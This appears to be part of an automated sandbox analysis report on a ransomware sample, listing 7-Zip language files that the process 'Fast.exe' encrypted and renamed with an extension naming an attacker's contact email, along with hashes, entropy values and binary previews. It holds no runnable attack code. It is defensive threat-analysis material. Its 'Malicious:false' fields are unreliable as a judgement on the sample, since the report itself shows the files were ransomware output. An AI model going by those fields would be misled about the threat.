    SSDEEP:384:7Om8xmAsZxxrucMLMyMvZ6KzzW3SeS7jK+GlLVQ7J3WSuRF9A:ixWNrqLMyMvZ6KzqieSC+GlL2J3XKrA
    MD5:2AADF9D668C7B3FB2774664340B3F2D0
    SHA1:86BAA569E374262EBCFE1E54889ABD04EF8A352E
    SHA-256:0B7233C865C9E0657562C3D1D7300370133DCCD7C89D19F3F23C06E83AD98E2F
    SHA-512:2589BE2644D9312A12A9332A021BBE2B796C52F4DD57C5AD129BE44307CE601A5F5BC4CC3ECAD47636DE7DE445632878BCA0C1C9075439D972FB14C23FB6C522
    Malicious:false
    Preview:..{a...z.t. .fN.C..@b@.8..^.U.........].2.........+..Z...c......../.f...:.(.-.. ...6.5..R..c...}w.%.r=\V.q}.r5*..nmqY...ThPE.=...j.Y#;5.d.2.....=....5.hO...............(.c.l.`<Cs.......g5&@c...d..3.}n..}WY.B..Cn!....<.c#qg.r...O8..P....2..q...~.i.q/..\....;...e.._s._f...q..C....lg....g.=.N...3.$.4..e...).x.fx:V8.{.J... .aB0t.B.C.uk.5Xt60|.....j&..7.(~h...(.G.......!...:..4...U..E....V....#.....&...b.y..]..H....j.u\c.W.|...r..0....^.....T..x;#y...{......v:::.E.q..!.?.......>[...'..WL........z.....i.@.R"84..u.k%2..-...U._....(.c..+g...%..:".~..-h.ag......O$..V...6...~.H.s..xq^TlD....?'.&c}.....d.U}W..... 6..!.SG._..g.H8..a......7.{..*+.D.#:....&.w.4 ...dhE.J.....'.!F.:n.U.%..3tm...T[D..@.*.A.V.]..............%.Z..d.$*c.....eg.....)...e.u...........y..b.2|2.p"......0(......oaX.!.z......d._.nm.Y.......P../2......j.0.....0T.H...1{%....z..&e.E.u....*........ ._,_;.L|...N...~..X....S.s`...k..*.)=.......;.J!.4.]-E.....>..Rb..?..s..j`+..[.

    C:\Program Files\7-Zip\Lang\si.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):19442
    Entropy (8bit):7.989845802193939
    Encrypted:false
    SSDEEP:384:e0Hj89E+futZKLf6IZnj+pL36R31wNA0nw3PcjL42gyd63Z5N2H2214GYj3YHXeL:e0Hj89E8wIRjKDuwlkPKovLS13Y7YHlA
    MD5:14A71D53970F638A4BE9041861206199
    SHA1:8631C1DB0D4C50934008600418F2C59F1997FAE0
    SHA-256:56C042CF9D583F60122A4FD36FD67BCD2929BC567AC4DF739A6A65ADAA4AA6CE
    SHA-512:23B7FF71A2DD8A5CFB4640782FC4D606EC56F1645C847FFB637148E7A04F0F9366D4B5F9B8CD139EDE85C93F14CFEB14FBB4ABC9E1F1D015BFE3D58906C4EA0A
    Malicious:false
    Preview:...:.`W.........$H...3Y....!P..To.Q....I.W.*R.ad^..Y..>..)R_-..vos.o..Ux-u...fxz0/...L+3ns#...6").....$.-.p#Ri}m....,.2R.x.3....Y......h....a...d.....K.s.UwtYJ.l.I...<..c..;.../..3.$.#.t+JI.Nk.~.A.H...y..8.v.....C.L.....G....[.........F."...EM..Kn...!J)....2.0{.sc...,.y.z..j...5@`lLb.p1..P..'$..j.....S..:.N.E:..C.Z..!.....j.)...B...Th.....D.....g....}.w..;S%.x5.......8Y.$q.]%.M....&.bu.(.gL... >......K;...t.7w...._.........G..Q`ki.z.G;~U..3._H..X.^A(E.W...`..J.>..Zt.m...*.........9.l...3J......x..% ...5/x.R..v..r..b...p(....Q...P..h.G.@-C....S...(l...!:f....F.@.D/{.Z-.xF..:.g.L......7....\".(3....ka..csP.:..[.g..j..qFJDK.'.J...y!V-b..j.....p..l.v(...c`.....)..(....6L.+...z*].j...|.....W.!..yER.....:.j.{-..!..#!d.iX....+..Q..zS....um......+e...-.&.0N.9.%A.M...ID...g...v..pt;5....~..m....Fg<6......(J'.^V2.(,Y.a.v...p..n,S..o.K).....~&w.xx;....i. .3..p..X..#.....l|..n......e..H.....A....7UG2..\..d.._...@.#..f....8m.&:..[.Q....b..|.xn

    C:\Program Files\7-Zip\Lang\sk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9602
    Entropy (8bit):7.981282384153289
    Encrypted:false
    SSDEEP:192:oEVU9+C/jZCbZD3h/gH5Jy88vriMyvFQFQJQmo3Z7COIInf6Ta+A:o2m+CLZC3h/eG88aqFBt7VxJ+A
    MD5:06E8408AFBA941F348C4F0E713A53A51
    SHA1:60CF24B5C10A500FE2D8AC78E848FEFCE24C4CB5
    SHA-256:6F9C84E3DACFB819ACBF38AC2DBD1D0DC856F06E990FBB2A9B31E021DF774821
    SHA-512:69EC4F3952DA9C779FAD2C31CB47305D7A7F77F08286212FFA92F9C04DCD6054E6A86E5B280A21EB247A3E3AA5A10E4507606D5538E5D3BD62D7699C0C4A2C5D
    Malicious:false
    Preview:m......f.n..}.j3........6.._}.]..K.q.B."....{@.L2w}B...n7DA....7:.....is..9R....e...a...y.d].9....>...r...%...A.........$.B.#.y.V....B!a+..[...#..X-[.#x....Z5R....z.!g.. .].I.<7...x..Ttl@e......I..8.u..V.s.xm..5.r,#9..*m....!7=..>Pn&......`O..T.r...be.I..B..Ss`...o..|<t....po|.Le{......B;.>x..J..T*...uA..1S..{G~.......z..(......g.....W....UL.!.2.d..7U.[..#.vB..>:...<......gp.-..]...Lr......{%.L8..7........s..>..,.........3.o(+uv?..~....5{.)`>..2...0..T.E.D.@....`.8..Q....)#<.>..%a..{....s?.uXv}........$......4..$.......cx...vf..".......A..2....=.hh.....U.......z.c.l.h.K....@. j_.y.y..].6..d\..4"?.....I...(.$Rg..j.XN@.....3..........UNS...(4.{..!x.2......v....(......THP.R. .0.h.HS.*.a3..p.,..B_~....6.3l.9.....D....X..W........j7^...C5.4.E....'-l...}...E......p.'..t&;..._...h......5.O%.....q5.].I...t...L..%[,..^.....-...%.<w..W.IIrO.,.(HM...v.a ...w.....2.._5..M..#%...yw.+)..7:..F.}........i......c..Y.J..Y..."...XW.."@...u*..._d..u..j.....6...

    C:\Program Files\7-Zip\Lang\sl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9154
    Entropy (8bit):7.980593435477677
    Encrypted:false
    SSDEEP:192:7/MxxrXJWtq1Y3ZuKMM7xsGJsi7mairYJpTvHW6p+0Oz7AnC5BA:2xbJWqm3ZMaxsG2iJLXfxPkcC5BA
    MD5:0B79B92F72D4B29B72AF63CC1D7EF144
    SHA1:5749BFB73956B1F7CA5FB863F1710AAD31894E51
    SHA-256:749A56203D4F642286C328C55E875A89EAD99CDB1836D4E659F349A984073D68
    SHA-512:A92F021035F42FE01EECE84BE2958C7FEC09C6AC332BBD375D5631F6DA01EBFA298EDEA3BC3E76337F3E7184AFD5B12B5647074BF2CE04CABD24560CE7352DA7
    Malicious:false
    Preview:....o._.:. >..X..z...GF..%yt98......y0@.....Lh...X.....1=;'....A"x..55T.74u..R.LK{..~||.....R...1...a:.?.....=.y..mS.......S.S.j.... ..|...d..\Wb.|..$|.*.O."...........M...V..i....t...G..Y.....R....g.\%..T.B...N.AS#).p.....J....JW.....m.......t.V..au=O..@VB.5...!'.K.)T..T....O1.*7.1..........:..#.........g..kP.1.>5..W-.`.c.*A:..m.u.......9.f.3..~..L...;_C..M..7.2...*..S&W..Acf)....+J..(.f-}&3.W......P..22WzZ..y.7s3+?..yv............<..F..l....`.](....S......J.....nRy.i9>.C..I......T..|9....M..v.."c..(.lE|.h....y.2FJ........v....B.R........1.(q9.*.o].4M[O.......]}....ID.!.D^.&.4b...,+.T....2..y!.....q....9.J..#..{......t..re.B....{.T.yj...?..pm..ZA3.b.....E.m.Sy';[....?\o.r....N...p..e.U...\C.A..*m=Y.~c..|L.<H`-O.{..&x.;.,.4..*.ylg..V;9.B;G..6m...H.1%@\...........J>2.X....G#.(.m.M.;.....w4R............fb..cR....(.. |...M.............x.....(`.2..@^2.F.[=....%..Q.m...?52.Ui.oeP....Z.m.}.....Rg.2da.&..1W/....NG.aZ.D.?.;y)..d.Q0.&..&.d...

    C:\Program Files\7-Zip\Lang\sq.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):6210
    Entropy (8bit):7.962985596713785
    Encrypted:false
    SSDEEP:192:2dtWyx/RiYZ1/Txg8K0GPFLMGbovQKdlXHA:2dtpRd1/dg8KnFIbvQKdlXA
    MD5:1D53C53956944CBEA4847A0FF9B2F739
    SHA1:372D2DAB4373FEA19D44EADA074EFE023993A4B5
    SHA-256:FBB9E67782BDE640E79594C0F89036BE8D3E6F6AE9EF4D9B037580284F5336D2
    SHA-512:00376375F1DA0FB21FBF3BF56A374E7BF216527FCB585F3FA4A2CAD556C1A0728A36F3581D9723603940F6732E1B2B0B9CB317903611B044AB5BFE03239BEE83
    Malicious:false
    Preview:...?.n.ry.._J.?....cJM...o.fuO.O.~l....=.&J.c[k...a..,O9.7..{.>.O.Tr...K.[{....].hB".a....8..QA..c.u/J.I4.T+a_.(....p.4..9.&.HD.@+............g.Ng..9n."{.E.h]<j*.h`..][m...0....c.T...[r,..G.$...."S@.v....^.<....=&fq..?........F2....r.s.:.......A.......`+}f......;)F.N...L.._r..8..M._w.t.'.GL.#~......`.N\.....K.....U\...E..u5U.q......................okr.?....z.M.UI..Mu.T...oR..U.VEt.d9..o'.d...#.}v...b+.MK%..,M9...&......7|...P..\..i..fV........)I..E..i..............ng4...RM%..C._...X..=....[...S......'.. ....&/....JY..UjV...~.4..v..\..].>..=^A..drk..g.._.p.$3.d.x.fT....VU...P+.O......ygd..;J.g[....A......3.C0^....|I.........x..y...t..........|=.XX{B..vI..&@.A:...g.........H6.GA6\~C.FC.....V%3o].Q...S?..C..1A.+P'.U.....u...;wE.'.!...v3\..9...R..O1L......B...2..:m.]}y...X..E.GX..~.v2..,.R.6..F/...%.K..Dnx7p.p#.......~co'.....f...e.U!.8.L..$..AP....G.n.t!u?v5.........y....&..;.B.J.....D f ..v2...?...!S...'%......3...S..|...>/<.D...R....+

    C:\Program Files\7-Zip\Lang\sr-spc.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):12242
    Entropy (8bit):7.9826004944761175
    Encrypted:false
    SSDEEP:192:+2Gs2F83E0fmM7+0Jh9+fF8hsDku0BAPrBFFcqdnT/EBERgNYNfViLJ8CSDieKUi:+2dfL7+0Jh9+f702Prx1dTysgNYuLBfZ
    MD5:ED3CD61245A332CC8D254ACDA57529D6
    SHA1:5932C7212EBCD9257E6E8B92068A78425924DC0B
    SHA-256:3CC2E02271F1C4C64D2FCE5BD72A0D84D3011F282C9ECA629D396EE88DF08F77
    SHA-512:27556532DCD62BA1B4CBD2793A414F3303F2AD8235C30F789EF8D34CD0FFAD79059DA69B9576EE7C2F17D545B92B4B269CA0E0964B80CF6BD2C853654AE803EF
    Malicious:false
    Preview:`@..S...%7.f%0.:.u..H{..y.l].fi..\..V...d..G......qfy6 .j).]Q...a..?.h.I.5.g...8..&....p3J.*....:j..9.@.K.....F&F.CfpP....,tv/.usM...c.b}.....".3.....= ..L5..>{.pux......"...%O..IH.......XEFg....K....~...!c..K.K.D..j..a.........Y..$..-|....tU+....F.k.&.E.#...ZC.&.(M...}....7.^..Y....l...0.....LG$9).=..2Wx.~5.6......49.I..~t.q...p...V.y.D\..K..^B.......s..G.O_.@*.U.`....D.UT.r.f.KF.....F....aIJ.I....c.......O..m.h.........fp...Q......~..wi+~aq....D.I}.E.V|r.g.O]9..q..s5.G..t.y.....hdL..{. T......K.}U..o}.F.v._....%..D..z.L(.n..m..H>L...z.3..'E..H...[M.s...o.1F.G...R...........M..@l...e.*Q... ?...: K.L)..u...]..8Ad...._..SX..C_.]y..]..c>B.Z.D.i..\....y......9.....<O>....p.....t.._.... >.".=.5.=1...Ozr!oZBf....-..i,.K...HyD..;..gIgHp..FV.....-d.8.`.v.cq...e8....1b....PA..8..&UW......z.g...iH...FDB...q..j.....{To..`.DY.....}....H..\'.sWH f.....G..-D...|.7.w...x..RU..!......'k]..E.N.Hi.......ty)..L..._...kj....(.X......\...y.`n.|^...ThS..........

    C:\Program Files\7-Zip\Lang\sr-spl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):7426
    Entropy (8bit):7.973356363489263
    Encrypted:false
    SSDEEP:192:SAXeM/ZxO17ijJBksloWKwanwGfe2kFcxQ:SDM07YJKsRKwNGfmexQ
    MD5:6B1830CBECEA034062AA992F4D99F37F
    SHA1:18A0DB0EF978A35E71CF5433DA2A81C5814F351D
    SHA-256:3F63A70E94D2EF9E72CE7C69C6B4861A7D18D07E8E7F9224DE2481B141C0A121
    SHA-512:6DB881E3EE6046AF7C509A813144CC08AD10D7FFA3FAB6237366795A31F6F09C185A129FE3C34CD72E4CD4FBA283B304801101C01865ABA1156392AA3FC9142B
    Malicious:false
    Preview:.e..!. ..c.../I.C...1.*.......I......=.5.,. ..!EVH..........2.....T..9.....@.k.2..g;g..B..-..6f...$...........('/.O.U.tV)>..DrV..qD..0.&...ph^7p....F.6...O....n/....o...V..I..p..c.y.u..g......k..$..k.....:..I\.N5.....+U..C%"88t&...t.]rAL..H..Sw...w...9V......\......:.;.+...n..w.}.B...m.#..u.....H.S....b..>..7..*P......d..0.,...#...d..j.........[~.ua.r..8..H.P.... ......b4..7....K.....J....B.pE&......0...~..z._...o.."..7.z.IT.j.4+.Z...e.....5.q..>..B..~a.|.r.O...<.W.".5..!...s...R..8/x..M. .^6..e.k....8......]h.q............S..u`\a..MJdH.cW......0.5U.x........4...W.....[.[..U.[.*..HIY>...Ds.F.l...S.......:-$K8...f...U.]2Q..i...-i...$...I.E.MM..$..W|\.TR..;.l.S.Iw...-|$..}L..`.Z%-C..O..w{.l.............W%.._.C..!X...+...2;...M.VI.(S....+*.Es..Q".e..D..#..r.s.f.'4..G......t.Tl.X..S.E.s.}.._......p....&a*.....Z....y.._U.WxU8.V...l.u."\d`'..w6.q....X.*l......u.W...=.&.....nVE.hD7.$Y.i"..;..N...|+...O.O.fI@..+.X^.Qg..(.2m4.p.B.r.R..?<D.4

    C:\Program Files\7-Zip\Lang\sv.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9458
    Entropy (8bit):7.978828723721702
    Encrypted:false
    SSDEEP:192:hDF8+pOZRk5YNYRCRg90QCRo0YuLhOGMTYVWa4Hdj15kPA:E+pOZi5pRCRU0Qhu9lMTYVWaE10PA
    MD5:4EDBC1EE6128C6B27D5A26353AFD5808
    SHA1:50BE799D9727BE23028B70BEF703D387590F30C1
    SHA-256:361CDBAAB90D86C19DCC06842D5BBD6AFEE81A872BF0FC364C2476291C5B335E
    SHA-512:7ECA3446375C0DA31BD680F761B34A3EECF4BA44AD456D742DF10216C417226A3696378A1F473B8812F649A43B5EB1E5C0B35B5DDF1573F9BA3416E0720EA9EF
    Malicious:false
    Preview:Ltf....ut...=.R.....:..08....2K.....z.9r...q.....p..S.8.....\.HRj.JE..r<.......Tl.....]..ymB......HbJ\..+.\....`._..I..-[a.y..U...c.O.P.._.4?..Y.Qd.P.......uQ...MX..Q<Q.P.%.6.i.(..Y.c.A.*P.....R..| .I.Z..D+R...)h8qnT......i..s=...-{.]3.\.....O.P.Dn.m#L..Q...N?a.Z.:n..?....,.-...f......W...C1.{..G.yf.I..5..W[....L.1..!..?.E..........w.Is\U.'.....n.-.....A....v?o...B.@...f...B$.b.....k.....GGY...7R..c.. .^.9.........R..-.....<.)....R.F..d.. .Ns.@....G.s.....=.U.o..L.E.DR.k.@..F....-G..).....gX....Y.,.w..W.Z5l...W.\..=..Dh...8BM....T.UZ..o.ldQ.%p.4.b.!!:...o.;.kR.=]..(...iQ...a*....9_...c..B.?|.....6....s.~..5....<.t.i..8|Q.78..I.yB....w...JMK5j+...u!....0K..J......?6.....=..7.l.....6..H..L....:37..5.."@.8"q...+...s.....Q....Ua..r...3!K`...,.Q.3.2......#...Tr........[^dH........X....s..=Q.A...S.D..#..U..FB./".E.....s.....!&...@e..Z......~}..m3.9 .v8n.;....Q<.<.j(,a.yk...g...i(.Ui..'..`....$.W...LQ.$..A....:.cR.&^...'...|.u'......

    C:\Program Files\7-Zip\Lang\sw.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:DOS executable (COM)
    Category:dropped
    Size (bytes):8770
    Entropy (8bit):7.9779699369781865
    Encrypted:false
    SSDEEP:192:NNaoPWuHn1eo3MeR02toDne+sTZsOPnr4CYQgNM55NWrrB4AA:Om1XM/SQErcQgNW5NcrB4AA
    MD5:3E73C566458864E26D91F9F638AD1773
    SHA1:30E0297E2562AFC0367E572CC39505882EF8B124
    SHA-256:CC3389AF639D658179157C780D3CEC9A127C995432C9B531D21E8C23DE02CCC1
    SHA-512:BE2A70576CAE6764F1DFC15347B8B0852A6896CE6B29795D258576F33FB95E9D57FB48125FA8BDF7196101433E9C14780B76714F8CAE80D436052E82FA1D7CD7
    Malicious:false
    Preview:.@.G.*.V.`.ds..N.x.J.F..|.x..|<c@...........'.3x...bO....-..t.xx..C^3.......(..wS.D....b.`..o./nJ.&...,..t..&..1........e..h.-.%..A+*...C.B..{Q7&..y....x._..AL...w..s.......H.....*......dJb.f....c$.......`hoZ..*.j.0".q....{.Rn....V..5........ |.b.X..I..8.xc|p2..b....{...R.$...'.......3.......c.a.....jE(|...[D.c....@w........E.......eA.m.. kF.w.....T.A....'Y....GG...+......K1. fx..`.o..m..fE.K.y.L?.D....@.."..l.yk.$6%.......f.....x...U%..D....i..P.<N..u.,.0......\w.% ..9yd.3....[...2.c.\6bg..M.j.~.J.M......j..*..(.^4;c0xHBO..Y..........0....+i)..S.u.j.o..+..>n.T..2E.... <..e.X...D$.....p.[..U|C.......(5.E.f.4...fx.......%bS.ne..A......5F.F.~...T..Q.....c..1...........X.....rJ..L..@.5`...S...`9.(c[H.)ey.?1...d...E^.K.t.q.Q...H...F.M.x....Gy^..V.....K...Y.......w..........u&...w..7...........b9F..i....?....D.<.{[..6...? ...C^..w.K...c.K..s..7x2Uw..."..9*`X...E.g....e9.q...C.....>...I...HU...ZH.k....=..\o....,......R..*.N..\b..mgD...

    C:\Program Files\7-Zip\Lang\ta.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):12690
    Entropy (8bit):7.984013373533406
    Encrypted:false
    SSDEEP:192:qk5QcQD5BJYgYw+K1/Hm0AY6gaWiIWTYFrb188I7XnhAKZFyKrAtrZMhWA:qk5QcQD5BNQ6n96gaUWO188GXhAuWA
    MD5:C062DB91F7866F530420CEF223BF8538
    SHA1:1F84A64FAB18B7A4E02C403CC2FA8E586EBD37FC
    SHA-256:2469E93024083569864B02F9B94CB3A110B15E8086004857FC390AA02936E5C5
    SHA-512:2BD76E9AB152E7B45CD49AFBCFFAA238FF63BA37F52B52BFA5D543E6E60DA15F68B7377BE28F767BC13B4A12E123A451746815255D2AC7B1357B6F90A63B6582
    Malicious:false
    Preview:..R.......?.,.'...S!.Z...@ .|.r....76[R.T...H.=.....Y./.f\....h..i..,......p..../...}La..O.I[...b...A3u.d.......E..(aL.(..q.w....J..lw...vt.><...3..I.n.{........\..4.._2...*....x.e..C.\.TI"}0....N.c.........]..r...h..P.7TUir.3..^STc..h....W.....|.Y..}.a...n.7PP.....Q..a..\z,.... ....@.q%...*...`."W..S....6AF.....*.F.rm..$0P....6P......SE..+..]rMs.FD.t..K..s8>.......3...)......m!..K.9.>.........w?R9[N.4..{.../#%...n.q.Up.-...-xr9..O.=.i..H>*.L.........|....nTt.L.5..I.N.. .n.gA5...A.A..z.q.M........b...h.F./..8...d..z...!z..;..U..)A)....Y.5......J.....#.m...M8.'j.X<`.m..._.[n-..h8.UVo.c.f~X..GqZR...r..|vI.Xv.=.V...;..gw.\/.M.^..:?s.....F..mn...m...TI..i.(5.>.*f.!.w.m6.T....c@.X...j....]..P.B}.A.=.u&..l%G^ 6.....G..$...a.,..0g..ZVY.#........>...;...'h.....e3..7...6 .x...+.5;.:C.:-.....3B..,l7.....$.:#.4.FG..R.......I...)...,?.dQ..h...e..^x...A.ZW....z.##...U.mP.....n.=q.Q....\A...)..i6..C..$V,...n.nf..y\H".....8.8....^./..V.....h.&).1.9.'....

    C:\Program Files\7-Zip\Lang\tg.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):15362
    Entropy (8bit):7.9868772433343045
    Encrypted:false
    SSDEEP:384:mpKf/xCcjh6EzmQYOaOEQQvHE6eVxemalwrH7mdnTA:sKfpCc6s5YByQvXgxo6H7uA
    MD5:093491229AF3F839024EEF169A2E36E4
    SHA1:4E45A1F2E1B500B981698AC59A548EEC26F0A33F
    SHA-256:41148704B6BCD7573E1332B061013B79E0BFD465B6340A3CBED96DDCED2715D8
    SHA-512:2498137978205F9EF9B55E90EF15E3D18B4C4BD210F670CDA9A55D97BD36D4915225C067E4DEA677E37D9E150ECBE4502076C093BCEC0B870BCD646B420AD910
    Malicious:false
    Preview:...-x..0!;.kq.............y.....D.Q...[O.j.9o.5.E.....-@#./.I}...-Z.@@....JK_.:y...R.p.."d...&z.R0...L.gCI_"?iYa.tiM!...s~.).Q....F.R.<(~5"..qd.3V|...........7n=..n/.G3.....".K.~...M.#.....%..q!.;...= ..........D.R.i....T....gQ.....E.p.pE{]x......_I.R.M..<.S.Q#{f]...>......5.@..........j...7}...$}....9.{.&....fX........TG...c.8%.?c?.E.).6..|.......T..d........f. .c)..|WR!\w./...A..k....|.......Q.......V.x.S)k..K....m..9.K.]....ro~.fb..b..Ivo.(.m rN!.NO)..yVE.@....?*.^.^.e.k.......X.6..U..........|=.V.v1........9.O.?&.......e..E.].tE...-N\.*..A.?0.~6....[=.J&....iW.fo.>..#..;.........ElO. ?yS.R1..<...D.\.......=....'.y...t.K..".b....;....5F.=...E......`B....Y.....~...{y..j.tq.1..A.m.... U>..Q.e.N....`...U..&.(D.=..4..^..PY.B.......j.kg...H{.wvAa...im.....>..M..+I.t.....M.......**.#7&xt..QR.q.SS....,D.e..W.)....7...f1.:.......@....9...)...G+.,G...J.....L..w..#&.&../0.J.?..c...z..-....'.w.{..E.CC.u...>..d<qM-...`~.v...c..R.KD../ek.a|..Dc...

    C:\Program Files\7-Zip\Lang\th.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):16082
    Entropy (8bit):7.987224944488671
    Encrypted:false
    SSDEEP:384:PcP0FU0ytWNMaEmqWtBuYGRuFrKmTDlH7j47d1cgQ/BvUU0A:j+0yt2MaEleGRuBKmpv40g20A
    MD5:A0EF5D46CB4D812C7917496AB78D8A89
    SHA1:70CE24A99FED1A49A53D2153AB5312369D439572
    SHA-256:125B6D63AD839C35EA12440BCB3F46DF5A03F8B37C66FF2A4C4006DE607C92A3
    SHA-512:B872DFB6DFCA697C3A8FE71BB16F3A419D6F23BA223B08B80AA633B7472F385128937CA1AE2D5809483E6F35632DA46009A1A5CC7D1DA75C3746605EB10C2A3E
    Malicious:false
    Preview:.]....L.....v........X....C....N.5..P.^.'.&. .&8.m=....Q1..b.Q...-........z........:.G O}Yp.bF....=.7.yP.v;..[~.z..~.O.....S..:".VQw.o.....:.d.q.\.h,.} .W.<...?....."n..?....f...[.L..L.#..KPB..(#..a...S.I.!....}.4.....rMG.....$.H.....[...B;.....l.<...^..u...m...H.4%.....S.^y:..\A.....5.......l.K>....t.\...z.!u.."..F...@.:'.=...=.....b....U....e..>P.%....7W*.....~(G.....s.).-...&+.C.._M{..Y....?.1S.V...Z..|6...y.ey.~......".l.*..g9s.UF].P....k'...z.....K.m.QH.cF...L...$.$.Z...{...f.t.c\......\.....A..y.]ovR.pA..g<m./M.7fq..)w|x{Dc..W....i.].6..P.;`..k...#..X.X...U.A.o..\.......3?.xU-n.).......wH.........].!..l.[.....X.._0...e.X0..F..RV...q....*.......p?...pH.i.#.. ..K...(m..JZ.c. ...;.....O.Ri>.b...H....j.hF.d.W...$RDR..!.ys........u!.xk....p..*........"Jpnf5......;.bi.........C.7..(y.....nTU.....S.7c......Y..g.BZ...^....0...Z..Q..o./....[.j..F%r.r.t...(-,./Eop.b]8.&....7~.,.8b......b....@.z..*M.D.V......\:...3.....I.F..S.?C

    C:\Program Files\7-Zip\Lang\tk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9458
    Entropy (8bit):7.978723950651482
    Encrypted:false
    SSDEEP:192:GsvjdrmPTKgE9NQmyuzOL3/PcKOea0rbt5sI7b+rF72yWaky5KQb7ezgtPFHA:GsZCLEv/aL3cN0Prb+h6VaP5Ke7ezsPG
    MD5:15E5FFE975D964327D8604068B291072
    SHA1:BFFDE7572558D844646C16D3981B19108A7F8D33
    SHA-256:4CBB012F490857AB2A31E7221F5690A24B85B0B767C7D8DF41D32589D32731D2
    SHA-512:645C682DDB972F7EFC174AE9B1AA61CA63334DD17DFFC3BF6E2605271EBDE4D8A5AE17A65B30397AB57861DEA8E1C16788ACA42A1CE2759A5D53CD9DFFE6CAFA
    Malicious:false
    Preview:...h..M.P..5..N......$.L{.}h@....?8!o0..jp|.3<z2...|.J.R....15......7.6D.D+3.$e.GD0V.<...3Lm....5.:.s!{....../N.K.....R.@q>......W.-......*.`.-.....~Va.u..a.e*..I[..?,C.`4....4...i.G.F5..j....qIy...]....Pd.g.h..X..kq...........Eu"...V..b./"...K........K...A....9y..M..l...;..+>.Y.:?+..H...[7v..:......_....#..3..6.\...i)#.tl..a.|..R.N....,.....#.<!....Q..r:.^.C,.U.t\..)/a..iY.;K...........9'../....4.../5.v....d,.....%]....w)..K..'.Z6..=.g.W.>.....t..2.....m...e.>..]..a..q..!..UR.W..br.._..'.....p.7...tl.Ar...G.7..>..p.)...*...R|..LJ....@.?.....W..wo....Z...|......A....../)l.?.....;u.....@....m..."...pj.Z.~.j1..@bHU...P.J...EQ.....+.....U....kV.....8l.......bv..2p.<k.M.%.|5*.8..5..]..d..VqO...}T@HK...<.....Ix;......(.=b.X#.<f...D!w]j.H......./.....A..H.-...%s)...3sm.0....!...F..u..".*h8*......x....Uc+.......J..-.....,t.s&8.....*...GL5.wd...c.k*F.{.....}9...`eh..9......K=...c.O*..W.....\e.B......-..Y...4_.x4I.:...D%.'.O..V..7..

    C:\Program Files\7-Zip\Lang\tr.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):10082
    Entropy (8bit):7.9802046098007065
    Encrypted:false
    SSDEEP:192:wICd9muUzIH5VQraeNk3MN/smHQIZ+OK7WvhUMlQTc6LQe4/x9lWLoA:w7LUzIHnWrPN/jJk9WblQLRexLWUA
    MD5:9655CAF5AA0A490B6298BBC865FAB243
    SHA1:B06AA586F2BE51EF3E0BFBF9122CF87A5A6D2889
    SHA-256:2E40DA442FC51CB98104502F9AFACBD4303EDD6B1580B41BAFF38264E77A91A0
    SHA-512:0100B8BCC58ABAE14A541851C43CABF9CE69324B4C40FD89AF8C6442ED0559C7B69F59A4F95C1085BD6625BA7D3D4F36B0A6CBADE31EF940C91EC06A579E6427
    Malicious:false
    Preview:.q]...r.......t.b..z..c#.D.C....K....7D /h.K..mX..D..u.9..N.m..N.....DW4pg-%....{O..G..\Z.x.JD...J......AuV...@...W.4(p....+.+.`u.9.&v.n.c:..HF.%7B..:..'..c..$.G.^..Q`..s..~B...P$@..N`.[.2m.<*......8Us...=...r....sH.<<."...3>....7&k.....-3/}...W...s`&..!.....4..rx.l..q..mLd..9. j.P.vO.....q.3..%....A.h..fB.....v&4#T....[".)Q...U(..Z.;.k.2~.+.v.....^....x."L"..Z;b....no+tR....G.a..^49..u.....S0.n.4..'9..... .......[.:..?.a2.5.as...#...f......=A....W8.C.4.....f......l.Yz..Q.NN.{]cB...|McM...Y.....b....]S..._.+F..9@b.6.kbC..........q.g......3.....g.-.&.\.....R..U..>t.7^....RF...Of...!...P....2Pq**...]..9.....[..j.G..p...Ux^..../...zI..p`u.wR0.m....+.i...Td).C..i...xc..2..P..k.........qA...Wy..LrD..zm.p.......}.\Z...@.]wV.".`~\..v18..P....a......>.wp...l..b....:B..o!.`;.;,...G..0..}...&......G.P....!.(...r..3....a..G.MN.I.onI.........b..1nfO.....m..z#.5S.:.3'...4.0}..n|wn.A....3s.S...r0.Oh..*.C+B.z.E.....+|=!.k.X.....IkD..k....|.

    C:\Program Files\7-Zip\Lang\tt.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):14434
    Entropy (8bit):7.984986873631358
    Encrypted:false
